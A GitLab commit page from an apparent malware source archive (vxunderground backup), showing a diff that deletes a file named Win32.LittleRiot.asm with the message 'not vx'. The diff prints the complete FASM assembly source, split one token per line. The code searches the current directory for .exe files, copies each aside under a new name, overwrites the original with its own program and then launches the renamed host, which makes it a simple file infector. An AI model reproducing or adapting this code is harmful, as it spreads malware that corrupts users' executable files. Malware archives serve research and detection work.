Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
MalwareSourceCode
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Wiki
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Releases
Package Registry
Container Registry
Model registry
Operate
Environments
Terraform modules
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Issue analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
backup
MalwareSourceCode
Commits
cf62f2c6
Unverified
Commit
cf62f2c6
authored
4 years ago
by
vxunderground
Committed by
GitHub
4 years ago
Browse files
Options
Downloads
Patches
Plain Diff
Delete Win32.LittleRiot.asm
not vx
parent
947d94e9
No related branches found
No related tags found
No related merge requests found
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
Win32/Win32.LittleRiot.asm
+0
-54
0 additions, 54 deletions
Win32/Win32.LittleRiot.asm
with
0 additions
and
54 deletions
Win32/Win32.LittleRiot.asm
deleted
100644 → 0
+
0
−
54
View file @
947d94e9
include
"
%
fasminc
%
\
win32ax.inc
"
LittleRiot:
invoke
GetCommandLine
mov
ebx
,
eax
inc
ebx
xor
ecx
,
ecx
GetEndCmd:
cmp
byte
[
ebx
],
'"'
je
HaveEndCmd
inc
ebx
inc
ecx
jmp
GetEndCmd
HaveEndCmd:
mov
byte
[
ebx
],
0
sub
ebx
,
ecx
push
ebx
invoke
FindFirstFile
,
ExeFiles
,
Win32FindData
mov
dword
[
FindHandle
],
eax
FindMore:
cmp
eax
,
0
je
ExecuteHost
mov
ebx
,
Win32FindData.cFileName
call
GetHostName
invoke
CopyFile
,
Win32FindData.cFileName
,
HostName
,
1
cmp
eax
,
0
je
FindNextVictim
pop
ebx
invoke
CopyFile
,
ebx
,
Win32FindData.cFileName
,
0
push
ebx
FindNextVictim:
invoke
FindNextFile
,
dword
[
FindHandle
],
Win32FindData
jmp
FindMore
ExecuteHost:
pop
ebx
call
GetHostName
invoke
WinExec
,
HostName
,
SW_SHOWNORMAL
ret
GetHostName
:
cmp
byte
[
ebx
],
0
je
RenameHostName
inc
ebx
jmp
GetHostName
RenameHostName:
sub
ebx
,
8
mov
esi
,
ebx
mov
edi
,
HostName
mov
ecx
,
5
rep
movsb
ret
data
import
library
kernel32
,
"KERNEL32.DLL"
import
kernel32
,
\
GetCommandLine
,
"
GetCommandLineA
"
,
\
FindFirstFile
,
"
FindFirstFileA
"
,
\
FindNextFile
,
"
FindNextFileA
"
,
\
CopyFile
,
"CopyFileA"
,
\
WinExec
,
"
WinExec
"
end
data
ExeFiles
db
"*.exe"
,
0
FindHandle
dd
?
Win32FindData
FINDDATA
HostName
rb
6
\ No newline at end of file
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment